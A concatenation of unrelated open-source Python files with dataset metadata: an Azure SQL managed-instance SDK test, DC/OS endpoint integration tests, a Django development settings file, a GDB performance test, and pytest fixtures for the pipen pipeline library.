security_group_name,
"allow_tds_inbound",
{
"protocol": "Tcp",
"access": "Allow",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "10.0.0.0/16",
"destination_address_prefix": "*",
"destination_port_range": "1433",
"priority": "1000"
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"allow_redirect_inbound",
{
"protocol": "Tcp",
"access": "Allow",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "10.0.0.0/16",
"destination_address_prefix": "*",
"destination_port_range": "11000-11999",
"priority": "1100"
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"deny_all_inbound",
{
"protocol": "*",
"access": "Deny",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "*",
"destination_address_prefix": "*",
"destination_port_range": "*",
"priority": "4096"
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"deny_all_outbound",
{
"protocol": "*",
"access": "Deny",
"direction": "Outbound",
"source_port_range": "*",
"source_address_prefix": "*",
"destination_address_prefix": "*",
"destination_port_range": "*",
"priority": "4095"
}
).result()
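        # Editorial note (not in the original test): NSG rules are evaluated
        # in ascending priority order, so the allow rules above (1000, 1100)
        # match before the catch-all deny rules (4095, 4096).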
# Create route table
route_table = self.network_client.route_tables.begin_create_or_update(
group_name,
route_table_name,
{
"location": location
}
).result()
# create virtual network
azure_operation_poller = self.network_client.virtual_networks.begin_create_or_update(
group_name,
network_name,
{
'location': location,
'address_space': {
'address_prefixes': ['10.0.0.0/16']
}
},
)
result_create = azure_operation_poller.result()
# create subnet
async_subnet_creation = self.network_client.subnets.begin_create_or_update(
group_name,
network_name,
subnet_name,
{
'address_prefix': '10.0.0.0/24',
'network_security_group': network_security_group,
'route_table': route_table,
'delegations': [
{
"service_name": "Microsoft.Sql/managedInstances",
"name": "dgManagedInstancexxx"
}
]
}
)
subnet_info = async_subnet_creation.result()
return subnet_info
@recorded_by_proxy
def test_instance_operation(self):
RESOURCE_GROUP = "testManagedInstance"
MANAGED_INSTANCE_NAME = "testinstancexxy"
#--------------------------------------------------------------------------
# /ManagedInstanceOperations/get/List the managed instance management operations[get]
#--------------------------------------------------------------------------
# result = self.client.managed_instance_operations.list_by_managed_instance(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME)
result = self.client.managed_instance_operations.list()
page_result = [item for item in result]
#--------------------------------------------------------------------------
# /ManagedInstanceOperations/get/Gets the managed instance management operation[get]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instance_operations.get(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, operation_id=OPERATION_ID)
#--------------------------------------------------------------------------
# /ManagedInstanceOperations/post/Cancel the managed instance management operation[post]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instance_operations.cancel(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, operation_id=OPERATION_ID)
@unittest.skip("it will take a long time.")
@ResourceGroupPreparer(location=AZURE_LOCATION)
def test_managed_instances(self, resource_group):
SUBSCRIPTION_ID = self.settings.SUBSCRIPTION_ID
RESOURCE_GROUP = resource_group.name
VIRTUAL_NETWORK_NAME = "myVirtualNetwork"
SUBNET_NAME = "mysubnet"
NETWORK_SECURITY_GROUP = "mynetworksecuritygroup"
ROUTE_TABLE = "myroutetable"
MANAGED_INSTANCE_NAME = "mymanagedinstancexpnvcxxvx"
INSTANCE_POOL_NAME = "myinstancepool"
if self.is_live:
self.create_virtual_network(RESOURCE_GROUP, AZURE_LOCATION, NETWORK_SECURITY_GROUP, ROUTE_TABLE, VIRTUAL_NETWORK_NAME, SUBNET_NAME)
#--------------------------------------------------------------------------
# /ManagedInstances/put/Create managed instance with minimal properties[put]
#--------------------------------------------------------------------------
BODY = {
"sku": {
# "name": "BC_Gen5",
# "tier": "GeneralPurpose"
"name": "MIGP8G4",
"tier": "GeneralPurpose",
"family": "Gen5"
},
"location": "westeurope",
"administrator_login": "dummylogin",
"administrator_login_password": "Un53cuRE!",
"subnet_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Network/virtualNetworks/" + VIRTUAL_NETWORK_NAME + "/subnets/" + SUBNET_NAME,
"storage_account_type": "GRS",
# "v_cores": "8",
# "storage_size_in_gb": "128",
# "collection": "Serbian_Cyrillic_100_CS_AS",
# "public_data_endpoint_enabled": True,
# "proxy_override": "Proxy",
# "timezone_id": "Central European Standard Time",
# "minimal_tls_version": "1.2",
# "license_type": "LicenseIncluded"
}
        # setup_method only creates self.client (the 2018-06-01-preview client
        # above is commented out), so use self.client here.
        result = self.client.managed_instances.begin_create_or_update(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, parameters=BODY)
# [Kaihui] it will use 6 hours to complete creation, so comment it.
# result = result.result()
#--------------------------------------------------------------------------
# /ManagedInstances/get/List managed instances by instance pool[get]
#--------------------------------------------------------------------------
        result = self.client.managed_instances.list_by_instance_pool(resource_group_name=RESOURCE_GROUP, instance_pool_name=INSTANCE_POOL_NAME)
#--------------------------------------------------------------------------
# /ManagedInstances/get/Get managed instance[get]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instances.get(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME)
#--------------------------------------------------------------------------
# /ManagedInstances/get/List managed instances by resource group[get]
#--------------------------------------------------------------------------
        result = self.client.managed_instances.list_by_resource_group(resource_group_name=RESOURCE_GROUP)
#--------------------------------------------------------------------------
# /ManagedInstances/get/List managed instances[get]
#--------------------------------------------------------------------------
        result = self.client.managed_instances.list()
#--------------------------------------------------------------------------
# /ManagedInstances/post/Failover a managed instance.[post]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instances.begin_failover(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, replica_type="Primary")
# result = result.result()
# #--------------------------------------------------------------------------
# # /ManagedInstances/patch/Update managed instance with minimal properties[patch]
# #--------------------------------------------------------------------------
# BODY = {
# "administrator_login": "dummylogin",
# "administrator_login_password": "Un53cuRE!",
# "subnet_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Network/virtualNetworks/" + VIRTUAL_NETWORK_NAME + "/subnets/" + SUBNET_NAME,
# "v_cores": "8",
# "storage_size_in_gb": "128",
# "collection": "Serbian_Cyrillic_100_CS_AS",
# "public_data_endpoint_enabled": True,
# "proxy_override": "Proxy",
# "timezone_id": "Central European Standard Time",
# "minimal_tls_version": "1.2"
# }
# result = self.mgmt_client.managed_instances.begin_update(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, parameters=BODY)
# result = result.result()
#--------------------------------------------------------------------------
# /ManagedInstances/delete/Delete managed instance[delete]
#--------------------------------------------------------------------------
        result = self.client.managed_instances.begin_delete(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME)
result = result.result()
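# Hedged aside (editorial addition): each `begin_*` call above returns an
# azure.core.polling.LROPoller; a minimal polling sketch, assuming an already
# configured `client` and existing resource names:
#
#     poller = client.managed_instances.begin_delete(
#         resource_group_name="my-rg", managed_instance_name="my-instance")
#     poller.wait()            # block until the long-running operation ends
#     print(poller.status())   # e.g. "Succeeded"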
avg_line_length: 44.750903 | max_line_length: 200 | alphanum_fraction: 0.53364
hexsha: f707ce44165fb1f567e85f5b11485980daeb77e2 | size: 4142 | ext: py | lang: Python
path: packages/dcos-integration-test/extra/test_endpoints.py
repo: aaronjwood/dcos @ b5f75d38e85e26ead42a1c41ec70c7c09591c6c0
licenses: ["Apache-2.0"]
import urllib.parse
import bs4
from retrying import retry
def test_if_dcos_ui_is_up(cluster):
r = cluster.get('/')
assert r.status_code == 200
assert len(r.text) > 100
assert 'DC/OS' in r.text
    # Arguably overkill, but also sanity-check the links on the page:
soup = bs4.BeautifulSoup(r.text, "html.parser")
for link in soup.find_all(['link', 'a'], href=True):
if urllib.parse.urlparse(link.attrs['href']).netloc:
            # Relative URLs only; others are too complex to handle here
continue
# Some links might start with a dot (e.g. ./img/...). Remove.
href = link.attrs['href'].lstrip('.')
link_response = cluster.head(href)
assert link_response.status_code == 200
def test_if_mesos_is_up(cluster):
r = cluster.get('/mesos')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Mesos</title>' in r.text
def test_if_all_mesos_slaves_have_registered(cluster):
r = cluster.get('/mesos/master/slaves')
assert r.status_code == 200
data = r.json()
slaves_ips = sorted(x['hostname'] for x in data['slaves'])
assert slaves_ips == cluster.all_slaves
def test_if_exhibitor_api_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/list')
assert r.status_code == 200
data = r.json()
assert data["port"] > 0
def test_if_exhibitor_ui_is_up(cluster):
r = cluster.get('/exhibitor')
assert r.status_code == 200
assert 'Exhibitor for ZooKeeper' in r.text
def test_if_zookeeper_cluster_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/status')
assert r.status_code == 200
data = r.json()
serving_zks = sum(1 for x in data if x['code'] == 3)
zks_ips = sorted(x['hostname'] for x in data)
zks_leaders = sum(1 for x in data if x['isLeader'])
assert zks_ips == cluster.masters
assert serving_zks == len(cluster.masters)
assert zks_leaders == 1
def test_if_uiconfig_is_available(cluster):
r = cluster.get('/dcos-metadata/ui-config.json')
assert r.status_code == 200
assert 'uiConfiguration' in r.json()
def test_if_dcos_history_service_is_up(cluster):
r = cluster.get('/dcos-history-service/ping')
assert r.status_code == 200
assert 'pong' == r.text
def test_if_marathon_ui_is_up(cluster):
r = cluster.get('/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_srouter_service_endpoint_works(cluster):
r = cluster.get('/service/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_mesos_api_is_up(cluster):
r = cluster.get('/mesos_dns/v1/version')
assert r.status_code == 200
data = r.json()
assert data["Service"] == 'Mesos-DNS'
def test_if_pkgpanda_metadata_is_available(cluster):
r = cluster.get('/pkgpanda/active.buildinfo.full.json')
assert r.status_code == 200
data = r.json()
assert 'mesos' in data
    assert len(data) > 5  # (prozlach) We could assert the minimal number of required packages
def test_if_dcos_history_service_is_getting_data(cluster):
@retry(stop_max_delay=20000, wait_fixed=500)
def check_up():
r = cluster.get('/dcos-history-service/history/last')
assert r.status_code == 200
# Make sure some basic fields are present from state-summary which the DC/OS
# UI relies upon. Their exact content could vary so don't test the value.
json = r.json()
assert {'cluster', 'frameworks', 'slaves', 'hostname'} <= json.keys()
assert len(json["slaves"]) == len(cluster.all_slaves)
check_up()
def test_if_we_have_capabilities(cluster):
"""Indirectly test that Cosmos is up since this call is handled by Cosmos.
"""
r = cluster.get(
'/capabilities',
headers={
'Accept': 'application/vnd.dcos.capabilities+json;charset=utf-8;version=v1'
}
)
assert r.status_code == 200
assert {'name': 'PACKAGE_MANAGEMENT'} in r.json()['capabilities']
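# Hedged aside (editorial addition): the @retry decorator used above comes
# from the `retrying` package; stop_max_delay and wait_fixed are both in
# milliseconds. A minimal sketch with a hypothetical predicate:
#
#     from retrying import retry
#
#     @retry(stop_max_delay=5000, wait_fixed=250)  # retry for up to ~5 s
#     def poll_endpoint():
#         assert service_is_up()  # hypothetical check, retried on failure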
avg_line_length: 28.763889 | max_line_length: 93 | alphanum_fraction: 0.666586
hexsha: f707d017ac3d245d2a68479e9e3c93fb3bf18ce3 | size: 3399 | ext: py | lang: Python
path: mysite/settings.py
repo: sssunda/django-board-REST @ 3151491764c8b79227eb537b1ecd4ee321d9d80b
licenses: ["MIT"] | stars: 1 (2019-06-06 to 2019-06-06)
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@2%a3gla^-3_x-7fxprr=@o=mafg(ac2%7drm9hbjj02xp&^@9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'board',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'board_rest',
'USER': 'postgres',
'PASSWORD': 'qwerty12345',
'HOST': 'localhost',
        'PORT': '',  # Leave empty to fall back to the default port.
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# REST_FRAMEWORK
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 5,
}
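# Hedged note (editorial addition): with PageNumberPagination and PAGE_SIZE = 5,
# DRF list endpoints return five items per page and accept a ?page=N query
# parameter; the response envelope looks roughly like:
#
#     {"count": 12, "next": ".../?page=2", "previous": null, "results": [...]}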
avg_line_length: 25.556391 | max_line_length: 91 | alphanum_fraction: 0.68932
hexsha: f707d07c1a26a18889462b824307dc5c95ab19c8 | size: 1509 | ext: py | lang: Python
path: contrib/gnu/gdb/dist/gdb/testsuite/gdb.perf/skip-prologue.py
repo: TheSledgeHammer/2.11BSD @ fe61f0b9aaa273783cd027c7b5ec77e95ead2153
licenses: ["BSD-3-Clause"] | stars: 3 (2021-05-04 to 2021-10-04)
# Copyright (C) 2013-2020 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# This test case is to test the speed of GDB when it is analyzing the
# function prologue.
from perftest import perftest
class SkipPrologue(perftest.TestCaseWithBasicMeasurements):
def __init__(self, count):
super(SkipPrologue, self).__init__("skip-prologue")
self.count = count
def _test(self):
for _ in range(1, self.count):
# Insert breakpoints on function f1 and f2.
bp1 = gdb.Breakpoint("f1")
bp2 = gdb.Breakpoint("f2")
# Remove them.
bp1.delete()
bp2.delete()
def warm_up(self):
self._test()
def execute_test(self):
for i in range(1, 4):
gdb.execute("set code-cache off")
gdb.execute("set code-cache on")
self.measure.measure(self._test, i)
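# Editorial note: `gdb` is deliberately not imported above -- this script runs
# inside GDB's embedded Python interpreter, where the `gdb` module is injected
# automatically; gdb.Breakpoint("f1") and bp.delete() are the standard
# Python-API calls for creating and removing breakpoints.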
avg_line_length: 35.093023 | max_line_length: 71 | alphanum_fraction: 0.673294
hexsha: f707d0bd49a7e0eeabc8b6ddd6261aa57c75d0a8 | size: 4679 | ext: py | lang: Python
path: tests/helpers.py
repo: sthagen/pwwang-pipen @ 2d32105511222cff2287e985708e80eba56276c7
licenses: ["Apache-2.0"] | stars: 41 (2017-08-30 to 2020-10-14) | issues: 39 | forks: 7
import sys
import signal
from tempfile import gettempdir
from pathlib import Path
from shutil import rmtree
from multiprocessing import Process
import pytest
from pipen import Proc, Pipen, plugin
class SimpleProc(Proc):
"""A very simple process for testing"""
input = ["input"]
class NormalProc(Proc):
"""A normal proc"""
input = "input:var"
output = ["output:{{in.input}}"]
script = "echo {{in.input}}"
class In2Out1Proc(Proc):
"""Process with 2 input vars and 1 output var"""
input = "in1:var, in2:var"
output = "out:var:{{in.in1}}_{{in.in2}}"
script = "echo {{in.in1}} {{in.in2}}"
class RelPathScriptProc(Proc):
"""Process uses relative path script"""
input = "in"
output = "out:var:{{in.in}}"
# use this file itself
script = "file://__init__.py"
class ScriptNotExistsProc(Proc):
"""Process uses relative path script"""
input = "in"
output = "out:var:{{in.in}}"
# use this file itself
script = "file:///no/such/file"
class ErrorProc(Proc):
"""Errant process"""
input = ["input"]
script = "exit 1"
class ScriptRenderErrorProc(Proc):
"""When script is failed to render"""
input = "a"
output = "b:var:1"
script = "{{c(d)}}"
class SleepingProc(Proc):
"""Process to sleep for a certain time"""
input = "time"
script = "sleep {{in.time}}"
class RetryProc(ErrorProc):
input = "starttime"
error_strategy = "retry"
num_retries = 10
lang = sys.executable # python
script = "import sys, time; sys.exit(1 if time.time() < {{in.starttime}} + 3 else 0)"
class OutputRenderErrorProc(Proc):
"""When output is failed to render"""
input = "a"
output = "b:var:{{c(d)}}"
class OutputNoNameErrorProc(Proc):
"""When no name/type given in output"""
input = "a"
output = "b"
class OutputWrongTypeProc(Proc):
"""When no name/type given in output"""
input = "a"
output = "b:c:d"
class OutputAbsPathProc(Proc):
"""When no name/type given in output"""
input = "a"
output = "b:file:/a/b"
class NoInputProc(Proc):
"""Process without input"""
class InputTypeUnsupportedProc(Proc):
"""Input type not supported"""
input = "input:unsupported:1"
class FileInputProc(Proc):
"""Process with file input"""
input = "in:file"
output = "out:file:{{in.in.split('/')[-1]}}"
script = "cat {{in.in}} > {{out.out}}"
class OutputNotGeneratedProc(Proc):
"""Process with output file not generated intentionally"""
input = "in"
output = "out:file:{{in.in}}"
script = "echo {{in.in}}"
class FileInputsProc(Proc):
"""Process with files input"""
input = "in:files"
output = "out:file:{{in.in[0].split('/')[-1]}}"
script = "echo {{in.in}} > {{out.out}}"
class MixedInputProc(Proc):
"""Process with mixed types of input"""
input = "invar:var, infile:file"
output = "outfile:file:{{in.invar}}"
script = "echo {{in.invar}} > {{out.outfile}}"
class DirOutputProc(Proc):
"""Process with directory output"""
input = "in"
output = "outfile:dir:outdir"
script = "echo {{in.in}} > {{out.outfile}}/outfile; "
class SimplePlugin:
@plugin.impl
async def on_init(pipen):
print("SimplePlugin")
@pytest.fixture
def pipen(tmp_path):
"""Get a simple Pipen object each time"""
index = Pipen.PIPELINE_COUNT + 1
pipen_simple = Pipen(
name=f"simple_pipeline_{index}",
desc="No description",
loglevel="debug",
cache=True,
workdir=tmp_path / ".pipen",
outdir=tmp_path / f"pipen_simple_{index}",
)
return pipen_simple
@pytest.fixture
def pipen_with_plugin(tmp_path):
"""Get a simple Pipen object each time"""
index = Pipen.PIPELINE_COUNT + 1
pipen_simple = Pipen(
name=f"simple_pipeline_{index}",
desc="No description",
loglevel="debug",
cache=True,
plugins=[SimplePlugin()],
workdir=tmp_path / ".pipen",
outdir=tmp_path / f"pipen_simple_{index}",
)
return pipen_simple
@pytest.fixture
def infile(tmp_path):
out = tmp_path / "infile"
out.write_text("in")
return out
@pytest.fixture
def infile1(tmp_path):
out = tmp_path / "infile1"
out.write_text("in1")
return out
@pytest.fixture
def infile2(tmp_path):
out = tmp_path / "infile2"
out.write_text("in2")
return out
def create_dead_link(path):
target = Path(gettempdir()) / "__NoSuchFile__"
target.write_text("")
link = Path(path)
if link.exists() or link.is_symlink():
link.unlink()
link.symlink_to(target)
target.unlink()
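# Hedged usage sketch (editorial addition): create_dead_link() leaves behind a
# symlink whose target has been deleted, useful for cache-invalidation tests:
#
#     create_dead_link(tmp_path / "dead")
#     assert (tmp_path / "dead").is_symlink()   # the link itself is present
#     assert not (tmp_path / "dead").exists()   # but it resolves to nothing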
avg_line_length: 20.70354 | max_line_length: 89 | alphanum_fraction: 0.617226